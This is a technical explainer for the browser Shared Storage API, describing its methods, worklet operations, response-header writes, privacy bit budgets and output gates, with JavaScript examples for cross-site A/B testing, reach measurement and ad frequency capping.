
Shared Storage API Explainer

Authors: Alex Turner, Camillia Smith Barnes, Josh Karlin, Yao Xiao

Introduction

In order to prevent cross-site user tracking, browsers are partitioning all forms of storage (cookies, localStorage, caches, etc.) by top-frame site. But there are many legitimate use cases currently relying on unpartitioned storage that will vanish without the help of new web APIs. We’ve seen a number of APIs proposed to fill in these gaps (e.g., Conversion Measurement API, Private Click Measurement, Storage Access, Private State Tokens, TURTLEDOVE, FLoC), but some use cases remain unaddressed (including cross-origin A/B experiments and user measurement). We propose a general-purpose, low-level API that can serve a number of these use cases.

The idea is to provide a storage API (named Shared Storage) that is intentionally not partitioned by top-frame site (though still partitioned by context origin of course!). To limit cross-site reidentification of users, data in Shared Storage may only be read in a restricted environment that has carefully constructed output gates. Over time, we hope to design and add additional gates.

Specification

See the draft specification.

Demonstration

You can try it out using Chrome 104+ (currently in canary and dev channels as of June 7th 2022).

Simple example: Consistent A/B experiments across sites

A third-party, a.example, wants to randomly assign users to different groups (e.g. experiment vs control) in a way that is consistent cross-site.

To do so, a.example writes a seed to its shared storage (the write is ignored if a seed is already present). a.example then registers and runs an operation in the shared storage worklet that assigns the user to a group based on the seed and the experiment name, and chooses the appropriate ad for that group.

In an a.example document:

function generateSeed() {
  // Illustrative stand-in: any sufficiently random per-user value works as a seed.
  return crypto.randomUUID();
}
await window.sharedStorage.worklet.addModule('experiment.js');

// Only write a cross-site seed to a.example's storage if there isn't one yet.
window.sharedStorage.set('seed', generateSeed(), { ignoreIfPresent: true });

// Fenced frame config contains an opaque form of the URL (urn:uuid) that is created by 
// privileged code to avoid leaking the chosen input URL back to the document.

const fencedFrameConfig = await window.sharedStorage.selectURL(
  'select-url-for-experiment',
  [
    {url: "blob:https://a.example/123…", reportingMetadata: {"click": "https://report.example/1..."}},
    {url: "blob:https://b.example/abc…", reportingMetadata: {"click": "https://report.example/a..."}},
    {url: "blob:https://c.example/789…"}
  ],
  { 
    data: { name: 'experimentA' }, 
    resolveToConfig: true
  }
);

document.getElementById('my-fenced-frame').config = fencedFrameConfig;

Worklet script (i.e. experiment.js):

class SelectURLOperation {
  hash(experimentName, seed) {
    // Illustrative stand-in: any stable hash of (experimentName, seed) works.
    let h = 0;
    for (const c of experimentName + seed) {
      h = (h * 31 + c.charCodeAt(0)) >>> 0;
    }
    return h;
  }

  async run(data, urls) {
    const seed = await this.sharedStorage.get('seed');
    return this.hash(data.name, seed) % urls.length;
  }
}
register('select-url-for-experiment', SelectURLOperation);

While the worklet script outputs the chosen index for urls, note that the browser process converts that index into a non-deterministic, opaque URL, which is returned via the fenced frame config and can only be read or rendered in a fenced frame. Because of this, the a.example iframe cannot itself work out which ad was chosen. Yet, it is still able to customize the ad it renders based on this protected information.

Goals

This API intends to support a wide array of use cases, replacing many of the existing uses of third-party cookies. These include recording (aggregate) statistics — e.g. demographics, reach, interest, anti-abuse, and conversion measurement — A/B experimentation, serving different documents depending on whether the user is logged in, and interest-based selection. Enabling these use cases will help to support a thriving open web. Additionally, by remaining generic and flexible, this API aims to foster continued growth, experimentation, and rapid iteration in the web ecosystem and to avert ossification and unnecessary rigidity.

However, this API also seeks to avoid the privacy loss and abuses that third-party cookies have enabled. In particular, it aims to limit cross-site reidentification of a user. Wide adoption of this more privacy-preserving API by developers will make the web much more private by default in comparison to the third-party cookies it helps to replace.

Related work

There have been multiple privacy proposals (SPURFOWL, SWAN, Aggregated Reporting) that have a notion of write-only storage with limited output. This API is similar to those, but tries to be more general to support a greater number of output gates and use cases. We’d also like to acknowledge the KV Storage explainer, to which we turned for API-shape inspiration.

Fenced frame enforcement

The usage of fenced frames with the URL Selection operation will not be required until at least 2026. We will provide significant advance notice before fenced frame usage is required. Until then, you are free to use an iframe with URL Selection instead of a fenced frame.

To use an iframe, omit passing in the resolveToConfig flag or set it to false, and set the returned opaque URN to the src attribute of the iframe.

const opaqueURN = await window.sharedStorage.selectURL(
  'select-url-for-experiment',
  [
    {url: "blob:https://a.example/123…"},
    {url: "blob:https://b.example/abc…"},
    {url: "blob:https://c.example/789…"}
  ],
  { 
    data: { ... } 
  }
);

document.getElementById('my-iframe').src = opaqueURN;

Proposed API surface

Outside the worklet

The setter methods (set, append, delete, and clear) should be made generally available across nearly any context. That includes top-level documents, iframes, shared storage worklets, Protected Audience worklets, service workers, dedicated workers, etc.

The shared storage worklet invocation methods (addModule, run, and selectURL) are available within document contexts.

  • window.sharedStorage.set(key, value, options)
    • Sets key’s entry to value.
    • key and value are both strings.
    • Options include:
      • ignoreIfPresent (defaults to false): if true, a key’s entry is not updated if the key already exists. The embedder is not notified which occurred.
  • window.sharedStorage.append(key, value)
    • Appends value to the entry for key. Equivalent to set if the key is not present.
  • window.sharedStorage.delete(key)
    • Deletes the entry at the given key.
  • window.sharedStorage.clear()
    • Deletes all entries.
  • window.sharedStorage.worklet.addModule(url, options)
    • Loads and adds the module to the worklet (i.e. for registering operations). The handling should follow the worklet standard, unless clarified otherwise below.
    • This method can only be invoked once per worklet. This is because after the initial script loading, shared storage data (for the invoking origin) will be made accessible inside the worklet environment, which can be leaked via subsequent addModule() (e.g. via timing).
    • url's origin need not match that of the context that invoked addModule(url).
      • If url is cross-origin to the invoking context, the worklet will use the invoking context's origin as its partition origin for accessing shared storage data and for budget checking and withdrawing.
      • Also, for a cross-origin url, the CORS protocol applies.
    • Redirects are not allowed.
  • window.sharedStorage.worklet.run(name, options),
    window.sharedStorage.worklet.selectURL(name, urls, options), …
    • Runs the operation previously registered by register() with matching name. Does nothing if there’s no matching operation.
    • Each operation returns a promise that resolves when the operation is queued:
      • run() returns a promise that resolves into undefined.
      • selectURL() returns a promise that resolves into either a fenced frame config (for fenced frames) or an opaque URN (for iframes), representing the URL selected from urls.
        • urls is a list of dictionaries, each containing a candidate URL url and optional reporting metadata (a dictionary, with the key being the event type and the value being the reporting URL; identical to Protected Audience's registerAdBeacon() parameter), with a max length of 8.
          • The url of the first dictionary in the list is the default URL. This is selected if there is a script error, or if there is not enough budget remaining.
          • The reporting metadata will be used in the short-term to allow event-level reporting via window.fence.reportEvent() as described in the Protected Audience explainer.
        • There will be a per-site (the site of the Shared Storage worklet) budget for selectURL. This is to limit the rate of leakage of cross-site data learned from selectURL to the destination pages that the resulting Fenced Frames navigate to. Each time a Fenced Frame navigates the top frame, log2(|urls|) bits will be deducted from the corresponding site’s budget for each selectURL() involved in the creation of that Fenced Frame. At any point in time, the current budget remaining is calculated as max_budget - sum(deductions_from_last_24hr).
        • The promise resolves to a fenced frame config only when resolveToConfig property is set to true. If the property is set to false or not set, the promise resolves to an opaque URN that can be rendered by an iframe.
    • Options can include:
      • data, an arbitrary serializable object passed to the worklet.
      • keepAlive (defaults to false), a boolean denoting whether the worklet should be retained after it completes work for this call.
        • If keepAlive is false or not specified, the worklet will shut down as soon as the operation finishes, and subsequent calls to it will fail.
        • To keep the worklet alive throughout multiple calls to run() and/or selectURL(), each of those calls must include keepAlive: true in the options dictionary.
  • window.sharedStorage.run(name, options),
    window.sharedStorage.selectURL(name, urls, options), …
    • The behavior is identical to window.sharedStorage.worklet.run(name, options) and window.sharedStorage.worklet.selectURL(name, urls, options).
  • window.sharedStorage.createWorklet(url, options)
    • Creates a new worklet, and loads and adds the module to the worklet (similar to the handling for window.sharedStorage.worklet.addModule(url, options)).
    • By default, the worklet uses the invoking context's origin as its partition origin for accessing shared storage data and for budget checking and withdrawing.
      • To instead use the worklet script origin (i.e. url's origin) as the partition origin for accessing shared storage, pass the dataOrigin option with "script-origin" as its value in the options dictionary.
      • Currently, the dataOrigin option, if used, is restricted to having either "script-origin" or "context-origin" as its value. "script-origin" designates the worklet script origin as the data partition origin; "context-origin" designates the invoking context origin as the data partition origin.
    • The object that the returned Promise resolves to has the same type as the implicitly constructed window.sharedStorage.worklet. However, for a worklet created via window.sharedStorage.createWorklet(url, options), only selectURL() and run() are available, whereas calling addModule() will throw an error. This is to prevent leaking shared storage data via addModule(), similar to the reason why addModule() can only be invoked once on the implicitly constructed window.sharedStorage.worklet.
    • Redirects are not allowed.
    • When the module script's URL's origin is cross-origin with the worklet's creator window's origin and when dataOrigin is "script-origin", a Shared-Storage-Cross-Origin-Worklet-Allowed: ?1 response header is required (see the illustrative response headers after this list).
    • The script server must carefully consider the security risks of allowing worklet creation by other origins (via Shared-Storage-Cross-Origin-Worklet-Allowed: ?1 and CORS), because this will also allow the worklet creator to run subsequent operations, and a malicious actor could poison and use up the worklet origin's budget.
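
For example, if a page on https://a.example creates a worklet from a cross-origin script at https://b.example/worklet.js with dataOrigin: "script-origin", the script's response would need to carry headers along these lines (the path and allowlist here are illustrative):

Shared-Storage-Cross-Origin-Worklet-Allowed: ?1
Access-Control-Allow-Origin: https://a.example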

In the worklet, during sharedStorage.worklet.addModule(url, options) or sharedStorage.createWorklet(url, options)

  • register(name, operation)
    • Registers a shared storage worklet operation with the provided name.
    • operation should be a class with an async run() method.
      • For the operation to work with sharedStorage.run(), run() should take data as an argument and return nothing. Any return value is ignored.
      • For the operation to work with sharedStorage.selectURL(), run() should take data and urls as arguments and return the index of the selected URL. Any invalid return value is replaced with a default return value (a minimal module sketch follows this list).
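
As a minimal sketch of these conventions, a single module might register one operation for run() and one for selectURL(). The operation names, keys, and selection logic below are illustrative:

// module.js (illustrative)
class LogVisitOperation {
  // For use with sharedStorage.run(); any return value is ignored.
  async run(data) {
    await this.sharedStorage.append('visit-count', '1');
  }
}

class PickURLOperation {
  // For use with sharedStorage.selectURL(); returns the index of the chosen URL.
  async run(data, urls) {
    const visits = (await this.sharedStorage.get('visit-count')) || '';
    // An invalid or out-of-range return value falls back to the default (index 0).
    return visits.length >= 3 ? 1 : 0;
  }
}

register('log-visit', LogVisitOperation);
register('pick-url', PickURLOperation);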

In the worklet, during an operation

  • sharedStorage.get(key)
    • Returns a promise that resolves into the key's entry or an empty string if the key is not present.
  • sharedStorage.length()
    • Returns a promise that resolves into the number of keys.
  • sharedStorage.keys() and sharedStorage.entries()
    • Returns an async iterator for all the stored keys or [key, value] pairs, sorted in the underlying key order (see the sketch after this list).
  • sharedStorage.set(key, value, options), sharedStorage.append(key, value), sharedStorage.delete(key), and sharedStorage.clear()
    • Same as outside the worklet, except that the promise returned only resolves into undefined when the operation has completed.
  • sharedStorage.remainingBudget()
    • Returns a number indicating the remaining available privacy budget for sharedStorage.selectURL(), in bits.
  • sharedStorage.context
    • From inside a worklet created inside a fenced frame, returns a string of contextual information, if any, that the embedder had written to the fenced frame's FencedFrameConfig before the fenced frame's navigation.
    • If no contextual information string had been written for the given frame, returns undefined.
  • Functions exposed by the Private Aggregation API, e.g. privateAggregation.contributeToHistogram().
    • These functions construct and then send an aggregatable report for the private, secure aggregation service.
    • The report contents (e.g. key, value) are encrypted and sent after a delay. The report can only be read by the service and processed into aggregate statistics.
    • After a Shared Storage operation has been running for 5 seconds, Private Aggregation contributions are timed out. Any future contributions are ignored and contributions already made are sent in a report as if the Shared Storage operation had completed.
  • Unrestricted access to identifying operations that would normally use up part of a page’s privacy budget, e.g. navigator.userAgentData.getHighEntropyValues()
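
As a sketch of an operation exercising several of these worklet-only methods (the operation name, keys, and the Private Aggregation bucket and value are illustrative):

class AuditOperation {
  async run(data) {
    // Iterate over all stored entries, in the underlying key order.
    let totalValueLength = 0;
    for await (const [key, value] of this.sharedStorage.entries()) {
      totalValueLength += value.length;
    }

    // Bits of selectURL() budget remaining for this site.
    const remainingBits = await this.sharedStorage.remainingBudget();

    // Contextual string written by the embedder via setSharedStorageContext(), if any
    // (only present when the worklet was created inside a fenced frame).
    const embedderContext = sharedStorage.context;

    // Report the number of stored keys via Private Aggregation.
    privateAggregation.contributeToHistogram({
      bucket: 1n,
      value: await this.sharedStorage.length(),
    });
  }
}
register('audit', AuditOperation);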

From response headers

  • set(), append(), delete(), and clear() operations can be triggered via the HTTP response header Shared-Storage-Write.
  • This may provide a large performance improvement over creating a cross-origin iframe and writing from there, if a network request is otherwise required.
  • Shared-Storage-Write is a List Structured Header.
    • Each member of the List is a String Item or Byte Sequence denoting the operation to be performed, with any arguments for the operation as associated Parameters.
    • The order of Items in the List is the order in which the operations will be performed.
    • Operations correspond to Items as follows:
      • set(<key>, <value>, {ignoreIfPresent: true}) ←→ set;key=<key>;value=<value>;ignore_if_present
      • set(<key>, <value>, {ignoreIfPresent: false}) ←→ set;key=<key>;value=<value>;ignore_if_present=?0
      • set(<key>, <value>) ←→ set;key=<key>;value=<value>
      • append(<key>, <value>) ←→ append;key=<key>;value=<value>
      • delete(<key>) ←→ delete;key=<key>
      • clear() ←→ clear
    • <key> and <value> Parameters are of type String or Byte Sequence.
  • Performing operations via response headers requires a prior opt-in via a corresponding HTTP request header Sec-Shared-Storage-Writable: ?1.
  • The request header can be sent along with fetch requests via specifying an option: fetch(<url>, {sharedStorageWritable: true}).
  • The request header can alternatively be sent on document or image requests either
    • via specifying a boolean content attribute, e.g.:
      • <iframe src=[url] sharedstoragewritable></iframe>
      • <img src=[url] sharedstoragewritable>
    • or via an equivalent boolean IDL attribute, e.g.:
      • iframe.sharedStorageWritable = true
      • img.sharedStorageWritable = true.
  • Redirects will be followed, and the request header will be sent to the host server for the redirect URL.
  • The origin used for Shared Storage is that of the server that sends the Shared-Storage-Write response header(s).
    • If there are no redirects, this will be the origin of the request URL.
    • If there are redirects, the origin of the redirect URL that is accompanied by the Shared-Storage-Write response header(s) will be used.
  • The response header will only be honored if the corresponding request included the request header: Sec-Shared-Storage-Writable: ?1.
  • See example usage below.

Example scenarios

The following are example use cases for Shared Storage; we welcome feedback on additional use cases that Shared Storage may help address.

Cross-site reach measurement

Measuring the number of users that have seen an ad.

In the ad’s iframe:

await window.sharedStorage.worklet.addModule('reach.js');
await window.sharedStorage.run('send-reach-report', {
  // optional one-time context
  data: { campaignId: '1234' },
});

Worklet script (i.e. reach.js):

class SendReachReportOperation {
  async run(data) {
    const reportSentForCampaign = `report-sent-${data.campaignId}`;

    // Compute reach only for users who haven't previously had a report sent for this campaign.
    // Users who had a report for this campaign triggered by a site other than the current one will
    // be skipped.
    if (await this.sharedStorage.get(reportSentForCampaign) === 'yes') {
      return; // Don't send a report.
    }

    // The user agent will send the report to a default endpoint after a delay.
    privateAggregation.contributeToHistogram({
      bucket: data.campaignId,
      value: 128, // A predetermined fixed value; see Private Aggregation API explainer: Scaling values.
    });

    await this.sharedStorage.set(reportSentForCampaign, 'yes');
  }
}
register('send-reach-report', SendReachReportOperation);

Creative selection by frequency

If an ad creative has been shown to the user too many times, a different ad should be selected.

In the advertiser's iframe:

// Fetches two ads in a list. The second is the proposed ad to display, and the first 
// is the fallback in case the second has been shown to this user too many times.
const ads = await advertiser.getAds();

// Register the worklet module
await window.sharedStorage.worklet.addModule('creative-selection-by-frequency.js');

// Run the URL selection operation
const frameConfig = await window.sharedStorage.selectURL(
  'creative-selection-by-frequency', 
  ads.urls, 
  { 
    data: { 
      campaignId: ads.campaignId 
    },
    resolveToConfig: true,
  });

// Render the frame
document.getElementById('my-fenced-frame').config = frameConfig;

In the worklet script (creative-selection-by-frequency.js):

class CreativeSelectionByFrequencyOperation {
  async run(data, urls) {
    // By default, return the default url (0th index).
    let index = 0;

    let count = await this.sharedStorage.get(data.campaignId);
    count = count ? parseInt(count) : 0;

    // If under cap, return the desired ad.
    if (count < 3) {
      index = 1;
      this.sharedStorage.set(data.campaignId, (count + 1).toString());
    }

    return index;
  }
}

register('creative-selection-by-frequency', CreativeSelectionByFrequencyOperation);

K+ frequency measurement

By instead maintaining a counter in shared storage, the approach for cross-site reach measurement could be extended to K+ frequency measurement, i.e. measuring the number of users who have seen K or more ads on a given browser, for a pre-chosen value of K. A unary counter can be maintained by calling window.sharedStorage.append("freq", "1") on each ad view. Then, the send-reach-report operation would only send a report if there are more than K characters stored at the key "freq". This counter could also be used to filter out ads that have been shown too frequently (similarly to the A/B example above).
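
As a sketch of the modified worklet operation (the key names and the choice of K are illustrative; the reporting pattern mirrors the reach example above):

class SendKPlusReachReportOperation {
  async run(data) {
    const kFrequency = 3; // Illustrative choice of K.
    const reportSentForCampaign = `kplus-report-sent-${data.campaignId}`;

    // Each ad view appends "1" to the "freq" key from the embedder, so the number of
    // characters stored at "freq" equals the number of views on this browser.
    const views = await this.sharedStorage.get('freq');
    const alreadySent = await this.sharedStorage.get(reportSentForCampaign) === 'yes';

    if (!views || views.length < kFrequency || alreadySent) {
      return; // Fewer than K views, or a report was already sent.
    }

    privateAggregation.contributeToHistogram({
      bucket: data.campaignId, // As in the reach example above.
      value: 128,
    });

    await this.sharedStorage.set(reportSentForCampaign, 'yes');
  }
}
register('send-kplus-reach-report', SendKPlusReachReportOperation);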

Reporting embedder context

In using the Private Aggregation API to report on advertisements within fenced frames, for instance, we might report on viewability, performance, which parts of the ad the user engaged with, the fact that the ad showed up at all, and so forth. But when reporting on the ad, it might be important to tie it to some contextual information from the embedding publisher page, such as an event-level ID.

In a scenario where the input URLs for the fenced frame must be k-anonymous, e.g. if we create a FencedFrameConfig from running a Protected Audience auction, it would not be a good idea to rely on communicating the event-level ID to the fenced frame by attaching an identifier to any of the input URLs, as this would make it difficult for any input URL(s) with the attached identifier to reach the k-anonymity threshold.

Instead, before navigating the fenced frame to the auction's winning FencedFrameConfig fencedFrameConfig, we could write the event-level ID to fencedFrameConfig using fencedFrameConfig.setSharedStorageContext() as in the example below.

Subsequently, anything we've written to fencedFrameConfig through setSharedStorageContext() prior to the fenced frame's navigation to fencedFrameConfig can be read via sharedStorage.context from inside a shared storage worklet created by the fenced frame, or created by any of its same-origin children.

In the embedder page:

// See https://github.com/WICG/turtledove/blob/main/FLEDGE.md for how to write an auction config.
const auctionConfig = { ... };

// Run a Protected Audience auction, setting the "resolveToConfig" option to true.
auctionConfig.resolveToConfig = true;
const fencedFrameConfig = await navigator.runAdAuction(auctionConfig);

// Write to the config any desired embedder contextual information as a string.
fencedFrameConfig.setSharedStorageContext("My Event ID 123");

// Navigate the fenced frame to the config.
document.getElementById('my-fenced-frame').config = fencedFrameConfig;

In the fenced frame (my-fenced-frame):

// Save some information we want to report that's only available inside the fenced frame.
const frameInfo = { ... };

// Send a report using shared storage and private aggregation.
await window.sharedStorage.worklet.addModule('report.js');
await window.sharedStorage.run('send-report', {
  data: { info: frameInfo },
});

In the worklet script (report.js):

class ReportingOperation {
  async run(data) {
    // Helper functions that map the embedder context to a predetermined bucket and the 
    // frame info to an appropriately-scaled value. 
    // See also https://github.com/patcg-individual-drafts/private-aggregation-api#examples
    function convertEmbedderContextToBucketId(context) { ... }
    function convertFrameInfoToValue(info) { ... }
    
    // The user agent sends the report to the reporting endpoint of the script's
    // origin (that is, the caller of `sharedStorage.run()`) after a delay.
    privateAggregation.contributeToHistogram({
      bucket: convertEmbedderContextToBucketId(sharedStorage.context),
      value: convertFrameInfoToValue(data.info)
    });
  }
}
register('send-report', ReportingOperation);

Keeping a worklet alive for multiple operations

Callers may wish to run multiple worklet operations from the same context, e.g. they might select a URL and then send one or more aggregatable reports. To do so, they would need to use the keepAlive: true option when calling each of the worklet operations (except perhaps in the last call, if there was no need to extend the worklet's lifetime beyond that call).

As an example, in the embedder page:

// Load the worklet module.
await window.sharedStorage.worklet.addModule('worklet.js');

// Select a URL, keeping the worklet alive.
const fencedFrameConfig = await window.sharedStorage.selectURL(
  'select-url',
  [
    {url: "blob:https://a.example/123…"},
    {url: "blob:https://b.example/abc…"}
  ],
  {
    data: { ... },
    keepAlive: true,
    resolveToConfig: true
  }
);

// Navigate a fenced frame to the resulting config.
document.getElementById('my-fenced-frame').config = fencedFrameConfig;

// Send some report, keeping the worklet alive.
await window.sharedStorage.run('report', {
  data: { ... },
  keepAlive: true,
});

// Send another report, allowing the worklet to close afterwards.
await window.sharedStorage.run('report', {
  data: { ... },
});

// From this point on, if we make any additional worklet calls, they will fail.

In the worklet script (worklet.js):

class URLOperation {
  // See previous examples for how to write a `selectURL()` operation class.
  async run(data, urls) { ... }
}

class ReportOperation {
  // See previous examples for how to write a `run()` operation class.
  async run(data) { ... }
}

register('select-url', URLOperation);
register('report', ReportOperation);

Loading cross-origin worklet scripts

There are currently four approaches to creating a worklet that loads a cross-origin script. The partition origin for the worklet's shared storage data access depends on the approach.

Using the context origin as data partition origin

The first three approaches use the invoking context's origin as the partition origin for shared storage data access and the invoking context's site for shared storage budget withdrawals.

  1. Call addModule() with a cross-origin script.

    In an "https://a.example" context in the embedder page:

    await sharedStorage.worklet.addModule("https://b.example/worklet.js");
    

    For any subsequent run() or selectURL() operation invoked on this worklet, the shared storage data for "https://a.example" (i.e. the context origin) will be used.

  2. Call createWorklet() with a cross-origin script.

    In an "https://a.example" context in the embedder page:

    const worklet = await sharedStorage.createWorklet("https://b.example/worklet.js");
    

    For any subsequent run() or selectURL() operation invoked on this worklet, the shared storage data for "https://a.example" (i.e. the context origin) will be used.

  3. Call createWorklet() with a cross-origin script, setting its dataOrigin option to the invoking context's origin.

    In an "https://a.example" context in the embedder page:

    const worklet = await sharedStorage.createWorklet("https://b.example/worklet.js", {dataOrigin: "context-origin"});
    

    For any subsequent run() or selectURL() operation invoked on this worklet, the shared storage data for "https://a.example" (i.e. the context origin) will be used.

Using the worklet script origin as data partition origin

The fourth approach uses the worklet script's origin as the partition origin for shared storage data access and the worklet script's site for shared storage budget withdrawals.

  4. Call createWorklet() with a cross-origin script, setting its dataOrigin option to the worklet script's origin.

    In an "https://a.example" context in the embedder page:

    const worklet = await sharedStorage.createWorklet("https://b.example/worklet.js", {dataOrigin: "script-origin"});
    

    For any subsequent run() or selectURL() operation invoked on this worklet, the shared storage data for "https://b.example" (i.e. the worklet script origin) will be used.

Writing to Shared Storage via response headers

For an origin making changes to their Shared Storage data at a point when they do not need to read the data, an alternative to using the Shared Storage JavaScript API is to trigger setter and/or deleter operations via the HTTP response header Shared-Storage-Write as in the examples below.

In order to perform operations via response header, the origin must first opt-in via one of the methods below, causing the HTTP request header Sec-Shared-Storage-Writable: ?1 to be added by the user agent if the request is eligible based on permissions checks.

An origin a.example could initiate such a request in multiple ways.

On the client side, to initiate the request:

  1. fetch() option:
    fetch("https://a.example/path/for/updates", {sharedStorageWritable: true});
  2. Content attribute option with an iframe (also possible with an img):
     <iframe src="https://a.example/path/for/updates" sharedstoragewritable></iframe>
    
    
  3. IDL attribute option with an iframe (also possible with an img):
    let iframe = document.getElementById("my-iframe");
    iframe.sharedStorageWritable = true;
    iframe.src = "https://a.example/path/for/updates";

On the server side, here is an example response header:

Shared-Storage-Write: clear, set;key="hello";value="world";ignore_if_present, append;key="good";value="bye", delete;key="hello", set;key="all";value="done"

Sending the above response header would be equivalent to making the following calls in the following order on the client side, from either the document or a worklet:

sharedStorage.clear();
sharedStorage.set("hello", "world", {ignoreIfPresent: true});
sharedStorage.append("good", "bye");
sharedStorage.delete("hello");
sharedStorage.set("all", "done");

Worklets can outlive the associated document

After a document dies, the corresponding worklet (if running an operation) will continue to be kept alive for a maximum of two seconds to allow the pending operation(s) to execute. This gives more confidence that any end-of-page operations (e.g. reporting) are able to finish.

Permissions Policy

Shared storage methods can be disallowed by the "shared-storage" policy-controlled feature. Its default allowlist is * (i.e. every origin).

The sharedStorage.selectURL() method can be disallowed by the "shared-storage-select-url" policy-controlled feature. Its default allowlist is * (i.e. every origin).
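
For example, a site that wants to turn both features off entirely could send the following response header; the allowlists can instead name specific origins (e.g. shared-storage=(self "https://trusted.example")). These values are illustrative:

Permissions-Policy: shared-storage=(), shared-storage-select-url=()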

Permissions Policy inside the shared storage worklet

The permissions policy inside the shared storage worklet will inherit the permissions policy of the associated document.

The Private Aggregation API will be controlled by the "private-aggregation" policy-controlled feature: within the shared storage worklet, if the "private-aggregation" policy-controlled feature is disabled, the privateAggregation methods will throw an exception.

Data Retention Policy

Each key is cleared thirty days after its last write (set or append call). If ignoreIfPresent is true, the last write time is updated even when the existing value is left unchanged.

Data Storage Limits

Shared Storage is not subject to the quota manager, as that would leak information across sites. Instead, its size is limited directly: each origin may store up to 5 megabytes in Shared Storage.

Dependencies

This API is dependent on the following other proposals:

  • Fenced frames (and the associated fenced frame config), used to render the URL selected by selectURL() without revealing it to the embedder.
  • Private Aggregation API, used to send aggregatable reports from within a worklet operation.

Output gates and privacy

The privacy properties of shared storage are enforced through limited output. So we must protect against any unintentional output channels, as well as against abuse of the intentional output channels.

URL selection

The worklet selects from a small list of (up to 8) URLs, each in its own dictionary with optional reporting metadata. The chosen URL is stored in a fenced frame config as an opaque form that can only be read by a fenced frame; the embedder does not learn this information. The chosen URL represents up to log2(num urls) bits of cross-site information (as measured according to information theory). Once the Fenced Frame receives a user gesture and navigates to its destination page, the information within the fenced frame leaks to the destination page. To limit the rate of leakage of this data, a bit budget is applied to the output gate. If the budget is exceeded, selectURL() will return the default (0th index) URL.

selectURL() can be called in a top-level fenced frame, but not from within a nested fenced frame. This is to prevent leaking lots of bits all at once via selectURL() chaining (i.e. a fenced frame can call selectURL() to add a few more bits to the fenced frame's current URL and render the result in a nested fenced frame). Use cases that will benefit from selectURL() being allowed from inside the top level fenced frame: issue.

Budgeting

The rate of leakage of cross-site data needs to be constrained. Therefore, we propose a daily budget on how many bits of cross-site data can be leaked by the API per site. Note that each time a Fenced Frame is clicked on and navigates the top frame, up to log2(|urls|) bits of information can potentially be leaked for each selectURL() involved in the creation of that Fenced Frame. Therefore, Shared Storage deducts log2(|urls|) bits from the Shared Storage worklet's site's budget at that point. If the sum of the deductions from the last 24 hours exceeds a threshold, then further selectURL()s will return the default value (the first url in the list) until some budget is freed up.

Why do we assume that log2(|urls|) bits of cross-site information are leaked by a call to selectURL? Because the embedder (the site calling selectURL) is providing a list of urls to choose from using cross-site information. If selectURL were abused to leak the first few bits of the user's cross-site identity, then, with 8 URLs to choose from, the caller could leak the first 3 bits of the id (e.g., imagine urls: https://example.com/id/000, https://example.com/id/001, https://example.com/id/010, ..., https://example.com/id/111). One can leak at most log2(|urls|) bits, and so that is what we deduct from the budget, but only after the fenced frame navigates the top frame, which is when its data can be communicated.

Budget Details

The budgets for bits of entropy for Shared Storage are as follows.

Long Term Budget

In the long term, selectURL() will leak bits of entropy on top-level navigation (e.g., a tab navigates). Therefore it is necessary to impose a budget for this leakage.

  • There is a 12 bit daily per-site budget for selectURL(), to be queried on each selectURL() call for sufficient budget and charged on navigation. This is subject to change.
  • The cost of a selectURL() call is log2(number of urls passed to the selectURL() call) bits. This cost is only logged once the fenced frame holding the selected URL navigates the top frame. For example, if the fenced frame can't communicate its contents (i.e. doesn't navigate), then there is no budget cost for that call to selectURL().
  • The remaining budget at any given time for a site is 12 - (the sum of the deductions, each log2(|urls|) bits, from the past 24 hours).
  • If the remaining budget is less than log2(number of urls in the selectURL() call), the default URL is returned and 1 bit is logged if the fenced frame is navigated. (A worked example follows this list.)
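
As an illustrative calculation: a selectURL() call with 8 candidate URLs costs log2(8) = 3 bits when its fenced frame navigates the top frame, so a site could pay for at most four such navigations (4 × 3 = 12 bits) within a 24-hour window before further selectURL() calls fall back to the default URL until budget is freed up.
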
Short Term Budgets

In the short term, we have event-level reporting and less-restrictive fenced frames, which allow further leakage; thus it is necessary to impose additional limits. On top of the navigation bit budget described above, there will be two more budgets, each maintained on a per top-level navigation basis. The bit values for each call to selectURL() are calculated in the same way as detailed for the navigation bit budget.

  • Each page load will have a per-site bit budget of 6 bits for selectURL() calls. At the start of a new top-level navigation, this budget will refresh.
  • Each page load will also have an overall bit budget of 12 bits for selectURL(). This budget will be contributed to by all sites on the page. As with the per-site per-page load bit budget, this budget will refresh when the top frame navigates.

Enrollment and Attestation

Use of Shared Storage requires enrollment and attestation via the Privacy Sandbox enrollment attestation model.

For each method in the Shared Storage API surface, a check will be performed to determine whether the calling site is enrolled and attested. In the case where the site is not enrolled and attested, the promise returned by the method is rejected.

Event Level Reporting

In the long term we'd like all reporting via Shared Storage to happen via the Private Aggregation output gate (or some additional noised reporting gate). We understand that in the short term it may be necessary for the industry to continue to use event-level reporting as they transition to more private reporting. Event-level reporting for content selection (selectURL()) will be available until at least 2026, and we will provide substantial notice for developers before the transition takes place.

Event level reports work in a way similar to how they work in Protected Audience. First, when calling selectURL, the caller adds an optional reportingMetadata dict to the URLs that they wish to send reports for, such as:

sharedStorage.selectURL(
    "test-url-selection-operation",
    [{url: "fenced_frames/title0.html"},
     {url: "fenced_frames/title1.html",
         reportingMetadata: {'click': "fenced_frames/report1.html",
             'visible': "fenced_frames/report2.html"}}]);

In this case, event types are defined for click and visible events within the fenced frame. Once the fenced frame is ready to send a report, it can call something like:

window.fence.reportEvent({eventType: 'visible',
    eventData: JSON.stringify({'duration': duration}), 
    destination: ['shared-storage-select-url']});

and it will send an HTTP POST request containing the eventData. See the fenced frame reporting document for more details.

Private aggregation

Arbitrary cross-site data can be embedded into any aggregatable report, but that data is only readable via the aggregation service. Private aggregation protects the data with differential privacy. In order to adhere to the chosen differential privacy parameters, there are limits on the total amount of value the origin's reports can provide per time-period. The details of these limits are explored in the API's explainer.

Choice of output type

The output type when running an operation must be pre-specified to prevent data leakage through the choice. This is enforced with separate functions for each output type, i.e. sharedStorage.selectURL() and sharedStorage.run().

Default values

When sharedStorage.selectURL() doesn’t return a valid output (including throwing an error), the user agent returns the default URL (the first URL in the list) to prevent information leakage. For sharedStorage.run(), there is no output, so any return value is ignored.

Preventing timing attacks

Revealing the time an operation takes to run could also leak information. We avoid this by having sharedStorage.run() queue the operation and then immediately resolve the returned promise. For sharedStorage.selectURL(), the promise resolves into a fenced frame config that contains an opaque URL, which is mapped to the selected URL once the operation completes. A Fenced Frame can be created with the returned fenced frame config even before the selectURL operation has completed; the frame will simply wait for it to complete first. Similarly, outside a worklet, set(), delete(), etc. return promises that resolve after queueing the writes. Inside a worklet, these writes join the same queue, but their promises only resolve after completion.

Possibilities for extension

